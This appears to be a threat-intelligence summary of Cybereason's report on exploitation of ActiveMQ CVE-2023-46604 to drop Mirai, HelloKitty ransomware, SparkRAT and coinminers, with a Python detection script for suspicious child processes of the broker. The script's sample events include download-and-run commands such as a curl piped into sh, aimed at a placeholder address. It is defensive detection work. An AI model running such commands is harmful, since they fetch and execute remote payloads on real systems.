Beware of the Messengers, Exploiting ActiveMQ Vulnerability: 67 related IOCs found

Important:

Summary:
Cybereason Security Services issues Threat Analysis Reports to inform on impacting threats and to provide practical recommendations for investigating and protecting against them. Using the remote code execution vulnerability disclosed on October 27 as CVE-2023-46604, malicious shell execution was observed from the Java process running Apache ActiveMQ on Linux servers; this is assessed with high confidence to be attempts to download the Mirai botnet, HelloKitty ransomware, SparkRAT executables, and coinminers including XMRig.
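The behaviour described above, a broker's Java process spawning a shell or downloader, is the detection hook a defender would want. The following is an added example, not code from the Cybereason report: it runs a parent/child process-command-line check over constructed sample events (the address 198.51.100.10 and the paths are made up).

```python
import re
from typing import Iterable, List, Optional, Tuple

# Interpreters and downloaders that a message broker has no business spawning.
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}


def basename(cmdline: str) -> str:
    """Executable name of a command line, without its directory."""
    parts = cmdline.split()
    return parts[0].rsplit("/", 1)[-1] if parts else ""


def is_activemq_java(cmdline: str) -> bool:
    """True when the command line is a Java process running Apache ActiveMQ."""
    return basename(cmdline) == "java" and "activemq" in cmdline.lower()


def flag_child(parent_cmd: str, child_cmd: str) -> Optional[str]:
    """Reason string if the child is suspicious for an ActiveMQ parent, else None."""
    if not is_activemq_java(parent_cmd):
        return None
    name = basename(child_cmd)
    if name in SHELLS:
        # Shell spawned by the broker: the pattern seen with CVE-2023-46604.
        # A download piped straight into an interpreter is called out separately.
        if re.search(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b", child_cmd):
            return "shell piping remote download into interpreter"
        return "shell spawned by ActiveMQ java process"
    if name in DOWNLOADERS:
        return "downloader spawned by ActiveMQ java process"
    return None


def detect(events: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """events: (parent_cmdline, child_cmdline) pairs; returns flagged (child, reason) pairs."""
    return [(child, reason) for parent, child in events if (reason := flag_child(parent, child))]


# Constructed sample events (not from the report); 198.51.100.10 is a documentation address.
BROKER = "/usr/bin/java -Dactivemq.home=/opt/activemq org.apache.activemq.console.Main start"
SAMPLE_EVENTS = [
    (BROKER, "sh -c curl -s http://198.51.100.10/x.sh | sh"),          # flagged
    (BROKER, "/usr/bin/wget http://198.51.100.10/bins/x86 -O /tmp/x86"),  # flagged
    (BROKER, "/opt/activemq/bin/activemq status"),                      # benign helper
    ("/usr/bin/java -jar /opt/app/app.jar", "sh -c ls"),                # other Java app
    ("/usr/sbin/cron -f", "sh -c /usr/bin/wget http://198.51.100.10/update"),  # not a broker
]

if __name__ == "__main__":
    for child, reason in detect(SAMPLE_EVENTS):
        print(f"ALERT [{reason}]: {child}")
```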


Beware of the Messengers, Exploiting ActiveMQ Vulnerability:
https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability
